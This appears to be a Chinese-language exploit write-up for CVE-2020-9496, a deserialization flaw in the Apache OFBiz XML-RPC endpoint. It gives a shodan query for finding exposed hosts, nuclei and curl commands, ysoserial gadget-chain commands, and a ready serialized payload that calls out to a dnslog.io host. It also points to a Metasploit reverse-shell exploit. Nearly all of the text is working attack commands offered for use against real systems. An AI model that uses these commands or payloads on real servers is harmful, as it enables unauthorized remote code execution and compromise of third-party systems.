影响范围
- < 17.12.04版本
资产特征
- Set-Cookie : OFBiz.Visitor
shodan搜索相关资产
1 | shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor |
具体就不贴了。
POC
cve-2020-9496
1 | id: CVE-2020-9496 |
方法一
1 | echo "https://localhost:8443" | nuclei -t cves/CVE-2020-9496.yaml |
方法二
1 | curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36' -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml' |
方法三
1 | java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" | base64 | tr -d "\n" |
1 | java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" | base64 | tr -d "\n" |
1 | POST /webtools/control/xmlrpc HTTP/1.1 |
1 | curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml' |
方法四
msf里面有该反弹shell的exp。